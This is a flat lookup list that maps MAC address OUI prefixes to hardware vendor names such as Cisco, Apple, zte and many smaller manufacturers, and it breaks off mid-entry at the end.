Cisco Systems +001079 Cisco Systems +00102F Cisco Systems +000E08 Cisco-Linksys +00602F Cisco Systems +006070 Cisco Systems +006083 Cisco Systems +00067C Cisco Systems +C8D719 Cisco-Linksys +CC08E0 Apple +5855CA Apple +8C7B9D Apple +88C663 Apple +C82A14 Apple +9803D8 Apple +8C5877 Apple +3451C9 Apple +E0B9BA Apple +D023DB Apple +B88D12 Apple +B817C2 Apple +68A86D Apple +78A3E4 Apple +54781A Cisco Systems +58971E Cisco Systems +CCD539 Cisco Systems +20BBC0 Cisco Systems +4C4E35 Cisco Systems +7CAD74 Cisco Systems +10F311 Cisco Systems +08CC68 Cisco Systems +D0C789 Cisco Systems +F84F57 Cisco Systems +34DBFD Cisco Systems +5CA48A Cisco Systems +AC7A4D Alps Electric +FC62B9 Alps Electric +0010A6 Cisco Systems +E86549 Cisco Systems +84B517 Cisco Systems +046273 Cisco Systems +9C57AD Cisco Systems +00223A Cisco Spvtg +001839 Cisco-Linksys +001EE5 Cisco-Linksys +38C85C Cisco Spvtg +F45FD4 Cisco Spvtg +002306 Alps Electric +001E3D Alps Electric +0019C1 Alps Electric +BC926B Apple +0050E4 Apple +003065 Apple +000A27 Apple +001451 Apple +0019E3 Apple +002312 Apple +002332 Apple +002436 Apple +00254B Apple +0026BB Apple +E80688 Apple +985AEB Apple +2078F0 Apple +78D75F Apple +E0ACCB Apple +98E0D9 Apple +C0CECD Apple +70E72C Apple +D03311 Apple +847D50 Holley Metering Limited +6C4A39 Bita +C8B5B7 Apple +A8BBCF Apple +90B21F Apple +B8E856 Apple +1499E2 Apple +04214C Insight Energy Ventures +B418D1 Apple +80006E Apple +60D9C7 Apple +C8F650 Apple +1C1AC0 Apple +E06678 Apple +5C8D4E Apple +64A3CB Apple +44FB42 Apple +F41BA1 Apple +3CE072 Apple +E88D28 Apple +CC785F Apple +AC3C0B Apple +88CB87 Apple +EC3586 Apple +F0C1F1 Apple +F4F951 Apple +18AF8F Apple +C0F2FB Apple +00F76F Apple +AC87A3 Apple +48437C Apple +34A395 Apple +9CF387 Apple +A85B78 Apple +908D6C Apple +0C1539 Apple +BC4CC4 Apple +0CBC9F Apple +A45E60 Apple +680927 Apple +60FACD Apple +1CABA7 Apple +8CFABA Apple +5C95AE Apple +E0C97A Apple +BC52B7 Apple +14109F Apple +542696 Apple +D8D1CB Apple +4C8ECC Silkan SA +98F428 zte +7C5A67 JNC Systems +C4BBEA Pakedge Device and Software +84100D Motorola Mobility, a Lenovo Company +D88B4C KingTing Tech. +6C9354 Yaojin Technology (Shenzhen) +4054E4 Wearsafe Labs +8CE2DA Circle Media +74D7CA Panasonic Automotive +1CCDE5 Shanghai Wind Technologies +D494E8 Huawei Technologies +B078F0 Beijing HuaqinWorld Technology +3029BE Shanghai MRDcom +7011AE Music Life +ECB870 Beijing Heweinet Technology +3095E3 Shanghai Simcom Limited +4040A7 Sony Mobile Communications AB +54BE53 zte +A01E0B Minix Technology Limited +D48304 Shenzhen Fast Technologies +385F66 Cisco Spvtg +544E90 Apple +58FC73 Arria Live Media +2C1BC8 Hunan Topview Network System +5CADCF Apple +006D52 Apple +D888CE RF Technology +D4F4BE Palo Alto Networks +B88687 Liteon Technology +68F956 Objetivos y Servicio de Valor Aadido +F4E926 Tianjin Zanpu Technology +04C23E HTC +2CFCE4 Ctek Sweden AB +C0B713 Beijing Xiaoyuer Technology +DCA3AC RBcloudtech +44656A Mega Video Electronic(HK) Industry +0C9160 Hui Zhou Gaoshengda Technology +ECA9FA Guangdong Genius Technology +300C23 zte +445F8C Intercel Group Limited +A48D3B Vizio +0C756C Anaren Microwave +5C5188 Motorola Mobility, a Lenovo Company +689AB7 Atelier Vision +640DE6 Petra Systems +283713 Shenzhen 3Nod Digital Technology +7CAB25 Mesmo Technology +74042B Lenovo Mobile Communication (Wuhan) Company Limited +4455B1 Huawei Technologies +A45602 fenglian Technology +D06A1F BSE +A88038 ShenZhen MovingComm Technology, Limited +805067 W & D Technology +402814 RFI Engineering +102C83 Ximea +D468BA Shenzhen Sundray Technologies Company Limited +A47B85 Ultimedia +CC37AB Edgecore Networks Corportation +F80D60 Canon +E02CB2 Lenovo Mobile Communication (Wuhan) Company Limited +DC15DB Ge Ruili Intelligent Technology ( Beijing ) +30F335 Huawei Technologies +E89120 Motorola Mobility, a Lenovo Company +546172 Zodiac Aerospace SAS +54CD10 Panasonic Mobile Communications +A4A1E4 Innotube +706879 Saijo Denki International +343D98 JinQianMao Technology +5804CB Tianjin Huisun Technology +1CB72C Asustek Computer +40B837 Sony Mobile Communications AB +287610 IgniteNet +68A378 Freebox SAS +746A3A Aperi +1844E6 zte +A8D409 USA 111 +3089D3 Hongkong Ucloudlink Network Technology Limited +4CB76D Novi Security +906CAC Fortinet +00323A so-logic +64DB81 Syszone +C4BAA3 Beijing Winicssec Technologies +20635F Abeeway +E00370 ShenZhen Continental Wireless Technology +709C8F Nero AG +807459 K's +CC9635 LVS +700136 Fatek Automation +E03560 Challenger Supply Holdings +0CB5DE Alcatel Lucent +E4CE70 Health & Life +EC5A86 Yulong Computer Telecommunication Scientific (Shenzhen) +F87AEF Rosonix Technology +C43ABE Sony Mobile Communications AB +18B169 Sonicwall +1CC72D Shenzhen Huapu Digital +38D82F zte +C8D779 Qingdao Haier TelecomLtd +2CA2B4 Fortify Technologies +D87495 zte +8C873B Leica Camera AG +28E476 Pi-Coral +9C685B Octonion SA +ACABBF AthenTek +5C41E7 Wiatec International +DC0914 Talk-A-Phone +142971 Nemoa Electronics (hk) +B47356 Hangzhou Treebear Networking +D88D5C Elentec +50ADD5 Dynalec +28D98A Hangzhou Konke Technology +BC4DFB Hitron Technologies. +40EACE Founder Broadband Network Service +10C67E Shenzhen Juchin Technology +3C4937 Assmann Electronic Gmbh +904506 Tokyo Boeki Medisys +80A85D Osterhout Design Group +9C6C15 Microsoft +EC74BA Hirschmann Automation and Control GmbH +683C7D Magic Intelligence Technology Limited +60128B Canon +ECBAFE Giroptic +E8447E Bitdefender SRL +84C3E8 Vaillant GmbH +B88EC6 Stateless Networks +146B72 Shenzhen Fortune Ship Technology +40A5EF Shenzhen Four Seas Global Link Network Technology +7C7A53 Phytrex Technology +4886E8 Microsoft +88E161 Art Beijing Science and Technology Development +B4A9FE Ghia Technology (shenzhen) +700FC7 Shenzhen Ikinloop Technology +EC8009 NovaSparks +64002D Powerlinq +101218 Korins +B04515 mira fitness +307512 Sony Mobile Communications AB +A49D49 Ketra +C09879 Acer +1C9ECB Beijing Nari Smartchip Microelectronics Company Limited +D48DD9 Meld Technology +2C3796 Cybo +9470D2 Winfirm Technology +2C2997 Microsoft +4CE2F1 sclak srl +344DEA zte +908C09 Total Phase +1C7E51 3bumen.com +380E7B V.P.S. Thai +38F33F Tatsuno +28A5EE Shenzhen Sdgi Catv +94CE31 CTS Limited +4CBB58 Chicony Electronics +C40006 Lipi Data Systems +789CE7 Shenzhen Aikede Technology +5C2ED2 ABC(XiSheng) Electronics +D8F710 Libre Wireless Technologies +68F728 Lcfc(hefei) Electronics Technology +DCEC06 Heimi Network Technology +8870EF SC Professional Trading +102F6B Microsoft +ACB74F Metel S.r.o. +CCF538 3isysnetworks +04DEDB Rockport Networks +68F06D Along Industrial, Limited +54F876 ABB AG +84930C InCoax Networks Europe AB +D47B35 NEO Monitors AS +D8FB11 Axacore +C8D019 Shanghai Tigercel Communication Technology +18A958 Provision Thai +D8DECE Isung +2053CA Risk Technology +142BD6 Guangdong Appscomm +B025AA Private +408256 Continental Automotive GmbH +D866EE Boxin Communication +3C189F Nokia +2829CC Corsa Technology Incorporated +FC790B Hitachi High Technologies America +28E6E9 SIS Sat Internet Services GmbH +BC4E5D ZhongMiao Technology +08F728 Globo Multimedia Sp. z o.o. Sp.k. +70720D Lenovo Mobile Communication Technology +8401A7 Greyware Automation Products +C4C9EC Gugaoo HK Limited +F406A5 Hangzhou Bianfeng Networking Technology +4C3909 HPL Electric & Power Private Limited +7CFE4E Shenzhen Safe vision Technology +54EF92 Shenzhen Elink Technology +800E24 ForgetBox +FCE186 A3M +CCB691 Necmagnuscommunications +40167E Asustek Computer +C89F1D Shenzhen Communication Technologies +983713 PT.Navicom Indonesia +ACA919 TrekStor GmbH +84850A Hella Sonnen- und Wetterschutztechnik GmbH +183009 Woojin Industrial Systems +6081F9 Helium Systems +34C5D0 Hagleitner Hygiene International GmbH +74DBD1 Ebay +3431C4 AVM GmbH +DC537C Compal Broadband Networks +A00627 Nexpa System +303335 Boosty +18D5B6 SMG Holdings +C8FF77 Dyson Limited +DCF110 Nokia +54DF00 Ulterius Technologies +E01D38 Beijing HuaqinWorld Technology +D80CCF C.g.v.s. +143DF2 Beijing Shidai Hongyuan Network Communication +B0D59D Shenzhen Zowee Technology +C4913A Shenzhen Sanland Electronic +A46032 MRV Communications (Networks) +205A00 Coval +0C2026 noax Technologies AG +880FB6 Jabil Circuits India Pvt,-ehtp Unit +C4626B ZPT Vigantice +74F85D Berkeley Nucleonics +48EE07 Silver Palm Technologies +9CFBF1 Mesomatic Gmbh &KG +94C014 Sorter Sp. j. Konrad Grzeszczyk MichaA, Ziomek +1027BE Tvip +2087AC AES motomation +A824EB ZAO NPO Introtest +447E76 Trek Technology (S) Pte +E8FC60 Elcom Innovations Private Limited +1CFCBB Realfiction ApS +B0EC8F GMX SAS +C40E45 ACK Networks +5C254C Avire Global Pte +7C1A03 8Locations +481842 Shanghai Winaas Equipment +D09C30 Foster Electric Company, Limited +78FEE2 Shanghai Diveo Technology +386C9B Ivy Biomedical +E44C6C Shenzhen Guo Wei Electronic +008B43 Rftech +2C957F zte +242642 Sharp +282246 Beijing Sinoix Communication +FC1607 Taian Technology(Wuxi) +CC89FD Nokia +E86183 Black Diamond Advanced Technology +C4824E Changzhou Uchip Electronics +24A87D Panasonic Automotive Systems Asia Pacific(Thailand)Co. +78EC74 Kyland-USA +28C825 DellKing Industrial +64E892 Morio Denki +086DF2 Shenzhen Mimowave Technology +48D0CF Universal Electronics +DCC793 Nokia +E03F49 Asustek Computer +D8EE78 Moog Protokraft +F4B6E5 TerraSem +28BB59 Rnet Technologies +7C8D91 Shanghai Hongzhuo Information Technology +A881F1 Bmeye +241148 Entropix +30B5C2 TP-Link Technologies +F85C45 IC Nexus +04DB8A Suntech International +083F76 Intellian Technologies +D0634D Meiko Maschinenbau GmbH & KG +889CA6 BTB Korea +B0DA00 Cera Electronique +447098 Ming Hong Technology (shen Zhen) Limited +00EEBD HTC +48B5A7 Glory Horse Industries +DC5E36 Paterson Technology +50E0C7 TurControlSystme AG +9CD643 D-Link International +28FC51 The Electric Controller and Manufacturing +34A5E1 Sensorist ApS +A4E9A3 Honest Technology +C4E92F AB Sciex +9C216A TP-Link Technologies +F862AA xn systems +A4059E STA Infinity LLP +6C15F9 Nautronix Limited +680AD7 Yancheng Kecheng Optoelectronic Technology +BC8893 Villbau +643F5F Exablaze +E8F226 Millson Custom Solutions +7060DE LaVision GmbH +FCFE77 Hitachi Reftechno +70533F Alfa Instrumentos Eletronicos Ltda. +448A5B Micro-Star INT'L +68193F Digital Airways +5CD61F Qardio +902083 General Engine Management Systems +14B126 Industrial Software +C03580 A&R Tech +1446E4 Avistel +907990 Benchmark Electronics Romania SRL +C49380 Speedytel technology +B4A82B Histar Digital Electronics +60A9B0 Merchandising Technologies +007DFA Volkswagen Group of America +6024C1 Jiangsu Zhongxun Electronic Technology +6C5AB5 TCL Technoly Electronics (Huizhou) +88789C Game Technologies SA +18AA45 Fon Technology +549359 Shenzhen Twowing Technologies +284430 GenesisTechnical Systems (UK) +9843DA Intertech +B07908 Cummings Engineering +04CB1D Traka plc +B87AC9 Siemens +B0989F LG CNS +3C300C Dewar Electronics +78B5D2 Ever Treasure Industrial Limited +A409CB Alfred Kaercher GmbH & KG +C445EC Shanghai Yali Electron +E8611F Dawning Information Industry +0CA694 Sunitec Enterprise +146080 zte +986CF5 zte +78491D The Will-Burt Company +74D435 Giga-byte Technology +840F45 Shanghai GMT Digital Technologies +D8270C MaxTronic International +E80410 Private +8C088B Remote Solution +A47760 Nokia +24A495 Thales Canada +883612 SRC Computers +E0A198 Noja Power Switchgear +CC7B35 zte +04D437 ZNV +CCF407 Eukrea Electromatique Sarl +BC2BD7 Revogi Innovation +24ECD6 CSG Science & Technology,Ltd.Hefei +102279 ZeroDesktop +CC4AE1 fourtec -Fourier Technologies +A4895B ARK Infosolutions PVT +38EC11 Novatek Microelectronics +A8CCC5 Saab AB (publ) +988E4A Noxus(beijing) Technology +1C4158 Gemalto M2M GmbH +541B5D Techno-Innov +78CB33 DHC Software +507691 Tekpea +A4C0C7 ShenZhen Hitom Communication TechnologyLTD +EC2257 JiangSu NanJing University Electronic Information Technology +341A4C Shenzhen Weibu Electronics +A09BBD Total Aviation Solutions +E8481F Advanced Automotive Antennas +18D6CF Kurth Electronic GmbH +E07F88 Evidence Network SIA +1C7CC7 Coriant GmbH +542CEA Protectron +00C5DB Datatech Sistemas Digitales Avanzados SL +109AB9 Tosibox Oy +F842FB Yasuda Joho +887398 K2E Tekpoint +68EE96 Cisco Spvtg +FC6018 Zhejiang Kangtai Electric +303EAD Sonavox Canada +444A65 Silverflare +50A0BF Alba Fiber Systems +3C977E IPS Technology Limited +F02405 Opus High Technology +D8B04C Jinan USR IOT Technology +646EEA Iskratel d.o.o. +043D98 ChongQing QingJia Electronics +E8BB3D Sino Prime-Tech Limited +98CDB4 Virident Systems +54E3B0 JVL Industri Elektronik +640B4A Digital Telecom Technology Limited +F42012 Cuciniale GmbH +4C21D0 Sony Mobile Communications AB +18104E Cedint-upm +2C7B84 OOO Petr Telegin +540536 Vivago Oy +E0FAEC Platan sp. z o.o. sp. k. +F08EDB VeloCloud Networks +B8DC87 IAI +7C6FF8 Shenzhen Acto Digital Video Technology +8C4B59 3D Imaging & Simulations +A4FB8D Hangzhou Dunchong TechnologyLtd +0075E1 Ampt +CC04B4 Select Comfort +284FCE Liaoning Wontel Science and Technology Development +0CC81F Summer Infant +D86960 Steinsvik +442AFF E3 Technology +0C9301 PT. Prasimax Inovasi Teknologi +60699B isepos GmbH +B830A8 Road-Track Telematics Development +542160 Resolution Products +88462A Telechips +A897DC IBM +E8DE27 TP-Link Technologies +FC229C Han Kyung I Net +148692 TP-Link Technologies +1832A2 Laon Technology +985C93 SBG Systems SAS +64E599 EFM Networks +F499AC Weber Schraubautomaten Gmbh +8CC7D0 zhejiang ebang communication +70820E as electronics GmbH +DC2BCA Zera GmbH +508D6F Chahoo Limited +68831A Pandora Mobility +D4223F Lenovo Mobile Communication Technology +0868D0 Japan System Design +103DEA HFC Technology (Beijing) +2C7B5A Milper +185AE8 Zenotech.Co. +E0AEED Loenk +D4EE07 Hiwifi +908260 Ieee 1904.1 Working Group +FCAD0F QTS Networks +984C04 Zhangzhou Keneng Electrical Equipment +CC047C G-WAY Microwave +44F849 Union Pacific Railroad +1CFA68 TP-Link Technologies +D0BE2C Cnslink +281878 Microsoft +E457A8 Stuart Manufacturing +2481AA KSH International +789966 Musilab Electronics (DongGuan)Co. +EC2C49 University of Tokyo +CC5D57 Information System Research Institute +1C37BF Cloudium Systems +249504 SFR +308999 Guangdong East Power +D4A499 InView Technology +AC4122 Eclipse Electronic Systems +A073FC Rancore Technologies Private Limited +846223 Shenzhen Coship Electronics +A4E991 Sistemas Audiovisuales Itelsis S.L. +84F493 OMS spol. s.r.o. +386793 Asia Optical +BCD177 TP-Link Technologies +C8B373 Cisco-Linksys +983071 Daikyung Vascom +0C0400 Jantar d.o.o. +C04301 Epec Oy +687CD5 Y Soft +E07C62 Whistle Labs +FC4499 Swarco LEA d.o.o. +0C8484 Zenovia Electronics +5CF370 CC&C Technologies +A01C05 Nimax Telecom +F80DEA ZyCast Technology +1800DB Fitbit +50A715 Aboundi +FC35E6 Visteon +D866C6 Shenzhen Daystar Technology +1836FC Elecsys International +F48139 Canon +D40BB9 Solid Semecs bv. +748E08 Bestek +B8C855 Shanghai Gbcom Communication Technology +C47DFE A.N. Solutions GmbH +E031D0 SZ Telstar +70C6AC Bosch Automotive Aftermarket +2C69BA RF Controls +DC5726 Power-One +2C245F Babolat VS +D464F7 Chengdu Usee Digital Technology +A47ACF Vibicom Communications +CC3C3F SA.S.S. Datentechnik AG +905692 Autotalks +0C2AE7 Beijing General Research Institute of Mining and Metallurgy +DCD52A Sunny Heart Limited +C4C755 Beijing HuaqinWorld Technology +9C79AC Suntec Software(Shanghai) +F8DFA8 zte +ACA430 Peerless AV +B4AB2C MtM Technology +74372F Tongfang Shenzhen Cloudcomputing Technology +BC51FE Swann communications +D40FB2 Applied Micro Electronics AME bv +74FE48 Advantech +D0B498 Robert Bosch Automotive Electronics +80B95C Elftech +E85AA7 LLC Emzior +242FFA Toshiba Global Commerce Solutions +A0BAB8 Pixon Imaging +9CE1D6 Junger Audio-Studiotechnik GmbH +E4E409 Leifheit AG +004D32 Andon Health +C46DF1 DataGravity +28D244 Lcfc(hefei) Electronics Technology +ACE87E Bytemark Computer Consulting +60CDC5 Taiwan Carol Electronics. +60C5A8 Beijing LT Honway Technology +B4DF3B Chromlech +A46E79 DFT SystemLtd +94DE80 Giga-byte Technology +C88A83 Dongguan HuaHong Electronics +0CC655 Wuxi YSTen Technology +D410CF Huanshun Network Science and Technology +B80415 Bayan Audio +84C8B1 Incognito Software Systems +645A04 Chicony Electronics +5C89D4 Beijing Banner Electric +984CD3 Mantis Deposition +8C4CDC Planex Communications +D063B4 SolidRun +2C3BFD Netstor Technology +F073AE Peak-system Technik +684CA8 Shenzhen Herotel Tech. +F4472A Nanjing Rousing Sci. and Tech. Industrial +185253 Pixord +FCA9B0 Miartech (shanghai) +80D733 QSR Automations +8C3330 EmFirst +08E5DA Nanjing Fujitsu Computer Products +5884E4 IP500 Alliance e.V. +04E9E5 Pjrc.com +703811 Invensys Rail +ACE64B Shenzhen Baojia Battery Technology +303294 W-IE-NE-R Plein & Baus GmbH +EC473C Redwire +5481AD Eagle Research +7C822D Nortec +745FAE TSL PPL +8462A6 EuroCB (Phils) +80FA5B Clevo +E4F365 Time-O-Matic +18550F Cisco Spvtg +1C9179 Integrated System Technologies +38F597 home2net GmbH +386645 Oosic Technology +D0DFB2 Genie Networks Limited +808B5C Shenzhen Runhuicheng Technology +04586F Sichuan Whayer information industry +449B78 The Now Factory +D052A8 Physical Graph +34F62D Sharp +C4EBE3 Rrcn SAS +4C1A95 Novakon +C04A00 TP-Link Technologies +9C3178 Foshan Huadian Intelligent Communications Teachnologies +48BE2D Symanitron +B86091 Onnet Technologies and Innovations +201A06 Compal Information (kunshan) +D4CA6E u-blox AG +C011A6 Fort-Telecom +B8DAF1 Strahlenschutz- Entwicklungs- und Ausruestungsgesellschaft mbH +1C11E1 Wartsila Finland Oy +50465D Asustek Computer +74BFA1 Hyunteck +F8AA8A Axview Technology (Shenzhen) +5894CF Vertex Standard LMR +2C5AA3 Promate Electronicltd +B4009C CableWorld +803FD6 bytes at work AG +645FFF Nicolet Neuro +2829D9 GlobalBeiMing technology (Beijing)Co. +189A67 CSE-Servelec Limited +38A5B6 Shenzhen Megmeet Electrical +E43FA2 Wuxi DSP Technologies +00FD4C Nevatec +6045BD Microsoft +9C54CA Zhengzhou Vcom Science and Technology +388AB7 ITC Networks +BCC23A Thomson Video Networks +00BF15 Genetec +20F85E Delta Electronics +68CE4E L-3 Communications Infrared Products +68B6FC Hitron Technologies. +7C160D Saia-Burgess Controls AG +A4D18F Shenzhen Skyee Optical Fiber Communication Technology +0C565C HyBroad Vision (Hong Kong) Technology +649FF7 Kone OYj +4C068A Basler Electric Company +E0A30F Pevco +5C1737 I-View Now +049C62 BMT Medical Technology s.r.o. +C4BA99 I+ME Actia Informatik und Mikro-Elektronik GmbH +0C2A69 electric imp, incorporated +BC811F Ingate Systems +34E0CF zte +6C40C6 Nimbus Data Systems +503F56 Syncmold Enterprise +D04CC1 Sintrones Technology +DC9FA4 Nokia +44C39B OOO Rubezh NPO +58C232 NEC +D8C691 Hichan Technology +7C02BC Hansung Electronics +1848D8 Fastback Networks +702393 fos4X GmbH +58ECE1 Newport +14358B Mediabridge Products +34996F VPI Engineering +241064 Shenzhen Ecsino Tecnical +10D1DC Instar Deutschland Gmbh +D8160A Nippon Electro-Sensory Devices +F45433 Rockwell Automation +EC9327 Memmert Gmbh + KG +1C43EC Japan Circuit +BC28D6 Rowley Associates Limited +F05F5A Getriebebau Nord Gmbh and KG +009569 LSD Science and Technology +34C803 Nokia +5011EB SilverNet +5CD41B Uczoon Technology +783CE3 Kai-EE +0868EA Eito Electronics +5C4A26 Enguity Technology +289EDF Danfoss Turbocor Compressors +50053D CyWee Group +4C64D9 Guangdong Leawin Group +7CB03E Osram Gmbh +14B1C8 InfiniWing +C0493D Maitrise Technologique +34A7BA Fischer International Systems +ACD364 ABB SPA, ABB Sace DIV. +38F8B7 V2com Participacoes +B48255 Research Products +2C750F Shanghai Dongzhou-Lawton Communication Technology +B40418 Smartchip Integrated +F4EA67 Cisco Systems +D0AEEC Alpha Networks +3C98BF Quest Controls +D05785 Pantech +045C06 Zmodo Technology +504A5E Masimo +38BF33 NEC Casio Mobile Communications +A041A7 NL Ministry of Defense +342F6E Anywire +E86D6E Voestalpine Signaling Fareham +F8D462 Pumatronix Equipamentos Eletronicos Ltda. +5453ED Sony +940070 Nokia +6C3A84 Shenzhen Aero-Startech.Ltd +442B03 Cisco Systems +781C5A Sharp +E4C6E6 Mophie +502D1D Nokia +BCEA2B CityCom GmbH +944444 LG Innotek +E4C806 Ceiec Electric Technology +18B591 I-Storm +A45630 Cisco Systems +002AAF LARsys-Automation GmbH +60F3DA Logic Way GmbH +A06D09 Intelcan Technosystems +BC1401 Hitron Technologies. +68D925 ProSys Development Services +B41DEF Internet Laboratories +284121 OptiSense Network +5057A8 Cisco Systems +38458C MyCloud Technology +0C9D56 Consort Controls +3CCE73 Cisco Systems +A47C14 ChargeStorm AB +F4600D Panoptic Technology +ACCF23 Hi-flying electronics technology +C08170 Effigis GeoSolutions +78C4AB Shenzhen Runsil Technology +709A0B Italian Institute of Technology +240917 Devlin Electronics Limited +DC37D2 Hunan HKT Electronic Technology +5076A6 Ecil Informatica Ind. Com. Ltda +B431B8 Aviwest +241125 Hutek +0036FE SuperVision +CC187B Manzanita Systems +38B12D Sonotronic Nagel GmbH +8020AF Trade Fides +50D274 Steffes +48D54C Jeda Networks +3497FB Advanced RF Technologies +C46413 Cisco Systems +143AEA Dynapower Company +9CA134 Nike +B4D8A9 BetterBots +7CC8D7 Damalisk +0091FA Synapse Product Development +A05AA4 Grand Products Nevada +24C0B3 RSF +E00B28 Inovonics +500B32 Foxda Technology Industrial(ShenZhen)Co. +302DE8 JDA, (JDA Systems) +70CA9B Cisco Systems +2C3F38 Cisco Systems +803F5D Winstars Technology +780738 Z.U.K. Elzab +640E36 Taztag +70EE50 Netatmo +EC63E5 ePBoard Design +60B606 Phorus +F4E6D7 Solar Power Technologies +78DDD6 c-scape +984A47 CHG Hospital Beds +3C6A7D Niigata Power Systems +FC455F Jiangxi Shanshui Optoelectronic Technology +3C7059 MakerBot Industries +F8FE5C Reciprocal Labs +6C9CED Cisco Systems +94E0D0 HealthStream Taiwan +DCF858 Lorent Networks +A05E6B Melper +30B3A2 Shenzhen Heguang Measurement & Control Technology +F0007F Janz - Contadores de Energia +CC944A Pfeiffer Vacuum GmbH +0C8525 Cisco Systems +BCE59F Waterworld Technology +1C5C55 Prima Cinema +082522 Advansee +4C2F9D ICM Controls +E467BA Danish Interpretation Systems A/S +BCFE8C Altronic +24BBC1 Absolute Analysis +7CDD11 Chongqing MAS Sci&tech.co. +C43C3C Cybelec SA +00D632 GE Energy +C40ACB Cisco Systems +7463DF VTS GmbH +3828EA Fujian Netcom Technology +2CEE26 Petroleum Geo-Services +DC3E51 Solberg & Andersen AS +D8B90E Triple Domain Vision +7C4B78 Red Sun Synthesis Pte +28D1AF Nokia +68BC0C Cisco Systems +2C9EFC Canon +98C845 PacketAccess +988217 Disruptive +80FFA8 Unidis +489BE2 SCI Innovations +B0E50E NRG Systems +4C5FD2 Alcatel-Lucent +E878A1 Beoview Intercom DOO +3057AC Irlab +28AF0A Sirius XM Radio +2486F4 Ctek +3CE5B4 Kidasen Industria E Comercio DE Antenas Ltda +A85BF3 Audivo GmbH +344F69 Ekinops SAS +C02973 Audyssey Laboratories +30168D ProLon +B451F9 NB Software +30688C Reach Technology +88F488 cellon communications technology(shenzhen)Co. +0041B4 Wuxi Zhongxing Optoelectronics Technology +D453AF Vigo System +1CE192 Qisda +20C8B3 Shenzhen Bul-tech +58B0D4 ZuniData Systems +64557F Nsfocus Information Technology +406AAB RIM +248707 SEnergy +EC3F05 Institute 706, The Second Academy China Aerospace Science & Industry +C4C19F National Oilwell Varco Instrumentation, Monitoring, and Optimization (NOV IMO) +68CD0F U Tek Company Limited +D4CEB8 Enatel +ECF236 Neomontana Electronics +E4A5EF Tron Link Electronics +AC4AFE Hisense Broadband Multimedia Technology +2C1EEA Aerodev +FC6C31 LXinstruments GmbH +3C6F45 Fiberpro +B4FC75 Sema Electronics(hk) +5C16C7 Big Switch Networks +B0BF99 Wizitdongdo +147DB3 JOA Telecom.co. +3CD16E Telepower Communication +00077D Cisco Systems +1045BE Norphonic AS +A0E295 DAT System +40F14C ISE Europe Sprl +98293F Fujian Start Computer Equipment +70D4F2 RIM +9067F3 Alcatel Lucent +64D912 Solidica +8C5CA1 d-broad +C8F981 Seneca s.r.l. +703187 ACX GmbH +14307A Avermetrics +8C7EB3 Lytro +587675 Beijing Echo Technologies +78EF4C Unetconvergence +E8DA96 Zhuhai Tianrui Electrical Power Tech. +6CA780 Nokia +04888C Eifelwerk Butler Systeme GmbH +1013EE Justec International Technology +704642 Chyng Hong Electronic +78BEB6 Enhanced Vision +ECEA03 Darfon Lighting +C8903E Pakton Technologies +7465D1 Atlinks +301A28 Mako Networks +D4945A Cosmo +5CF207 Speco Technologies +B01B7C Ontrol A.S. +D47B75 Harting Electronics Gmbh +70E843 Beijing C&W Optical Communication Technology +08ACA5 Benu Video +D89DB9 eMegatech International +405A9B Anovo +ACCA54 Telldus Technologies AB +CC1EFF Metrological Group BV +941673 Point Core Sarl +6C5D63 ShenZhen Rapoo Technology +E4D71D Oraya Therapeutics +C8FE30 Bejing Dayo Mobile Communication Technology +64B64A ViVOtech +DCA7D9 Compressor Controls +C455A6 Cadac Holdings +BCBBC9 Kellendonk Elektronik GmbH +781DFD Jabil +103711 Simlink AS +601199 Siama Systems +300B9C Delta Mobile Systems +90EA60 SPI Lasers +D46F42 Waxess USA +B0A72A Ensemble Designs +50795B Interexport Telecomunicaciones +E8C229 H-Displays (MSC) Bhd +B0BDA1 Zaklad Elektroniczny Sims +8C4435 Shanghai BroadMobi Communication Technology +24B8D2 Opzoon Technology +24CBE7 MYK +88BFD5 Simple Audio +948B03 Eaget Innovation and Technology +802DE1 Solarbridge Technologies +F081AF IRZ Automation Technologies +14EB33 BSMediasoft +AC8674 Open Mesh +14A9E3 MST +589835 Technicolor +50D6D7 Takahata Precision +B4A5A9 Modi Gmbh +D09B05 Emtronix +98EC65 Cosesy ApS +900917 Far-sighted mobile +88F077 Cisco Systems +AC4723 Genelec +20B7C0 Omicron Electronics Gmbh +D42C3D Sky Light Digital Limited +806CBC NET New Electronic Technology GmbH +1C184A ShenZhen RicherLink Technologies +04E662 Acroname +F0BF97 Sony +C44AD0 Fireflies Systems +88E0A0 Shenzhen VisionSTOR Technologies +6879ED Sharp +9CC0D2 Conductix-Wampfler GmbH +447E95 Alpha and Omega +E8B748 Cisco Systems +DC16A2 Medtronic Diabetes +78CA04 Nokia +2C8BF2 Hitachi Metals America +58F98E Secudos Gmbh +2826A6 PBR electronics GmbH +CC7669 Seetech +E437D7 Henri Depaepes. +582F42 Universal Electric +AC20AA Dmatek +E0A1D7 SFR +28852D Touch Networks +F02A61 Waldo Networks +B8415F ASP AG +2CB69D RED Digital Cinema +988E34 Zhejiang Boxsam Electronic +D44C24 Vuppalamritha Magnetic Components +4CB4EA HRD (S) PTE. +34BDF9 Shanghai WDK Industrial +74CE56 Packet Force Technology Limited Company +A89B10 inMotion +888C19 Brady Asia Pacific +747DB6 Aliwei Communications +B41489 Cisco Systems +AC6F4F Enspert +8886A0 Simton Technologies +F0C88C LeddarTech +68EBC5 Angstrem Telecom +448C52 Ktis +686359 Advanced Digital Broadcast SA +4018D7 Smartronix +18922C Virtual Instruments +F80F84 Natural Security SAS +EC9ECD Artesyn Embedded Technologies +303955 Shenzhen Jinhengjia Electronic +FC5B24 Weibel Scientific A/S +34B571 Plds +A862A2 Jiwumedia +984E97 Starlight Marketing (H. K.) +7C6ADB SafeTone Technology +EC986C Lufft Mess- und Regeltechnik GmbH +B0518E Holl technologyLtd. +DCDECA Akyllor +A071A9 Nokia +8065E9 BenQ +845DD7 Shenzhen Netcom Electronics +447DA5 Vtion Information Technology (fujian) +0CCDD3 Eastriver Technology +B8E589 Payter BV +C89C1D Cisco Systems +503DE5 Cisco Systems +801440 Sunlit System Technology +948D50 Beamex Oy Ab +94E226 D. ORtiz Consulting +386E21 Wasion Group +D8C99D EA Display Limited +CCFC6D RIZ Transmitters +AC80D6 Hexatronic AB +9CF938 Areva NP Gmbh +500E6D TrafficCast International +1CFEA7 IDentytech Solutins +D0B53D Sepro Robotique +A0DE05 JSC Irbis-T +8895B9 Unified Packet Systems Crop +78593E Rafi Gmbh &KG +684352 Bhuu Limited +3CC0C6 d&b audiotechnik GmbH +F8DAF4 Taishan Online Technology +D8E3AE Cirtec Medical Systems +A83944 Actiontec Electronics +FC1FC0 Eurecam +4891F6 Shenzhen Reach software technology +EC14F6 BioControl AS +B8D06F Guangzhou Hkust FOK Ying Tung 